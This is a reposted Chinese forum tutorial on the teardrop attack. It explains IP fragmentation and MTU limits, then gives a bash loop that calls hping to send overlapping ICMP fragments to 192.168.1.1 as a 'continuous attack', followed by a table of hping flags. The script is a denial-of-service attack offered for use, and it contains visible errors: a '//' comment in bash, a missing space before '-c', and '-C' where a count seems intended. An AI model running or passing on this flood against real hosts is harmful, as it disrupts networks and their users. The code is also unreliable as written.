[ 转载]泪滴攻击的原理,以及在Linux下实现
泪滴攻击是利用ip分片来实现的,首先来了解下ip分片的原理,,网络中数据链路都有自己的帧格式,例如以太网的帧格式, 目的地址,源地址,类型,数据,FCS
其中,数据字段的长度最大为1500字节,这个数值为MTU (最大传输单位),不同的网络有不同的MTU 值,例如以太网的MTU 是1500 字节,PPP 链路的MTU 值是196字节。。
当ip数数据报封装成帧时,必须符合帧格式的规定,如果ip数据报的总长度小于或等于MTU值,,那么就可以直接封装成一个帧,如果ip数据报的总长度大于MTU 值,就必须分片,
然后将每一个分片封装成一个帧。 ip数据报可以被源主机或在其路径上的任何路由器进行分片,,然后每一个分片经过路由到达目的主机,在进行重装。。我们可以在Linux下使用hping来实现
泪滴攻击,,
命令如下,我在Linux下编辑一个脚本,#!/bin/bash
for ((i=100;i<150;i++)) //持续攻击,所以做了50个循环。。
do
./hping 192.168.1.1 -1 -x -d 1000 -N 100-c 1
./hping 192.168.1.1 -1 -d 200 -g 1008 -N 100 -C 1
done
第一条命令是向目标为192.168.1.1 的主机发送第一个分片,负荷大小为1000 ,ID 为 100
第二条命令是发送第二个分片,设置载荷大小为200 偏移为1008 ,ID 为100
命令参数表如下:
-1 使用ICMP 模式,
-2 使用UDP 模式。
-p 指定目标主机的端口号,,
-i 设置发送时间间隔,
-s 设置SYN 标志,
-a 伪造原ip地址。
-c 发送数据报个数,
-N 设置IP 包的ID
-t 设置TTL
-x 设置 more fragments 标准
-g 设置fragment offest
-C 设置ICMP类型
-d 设置负荷大小 看不懂。{:Yem93:Y}
页:
[1]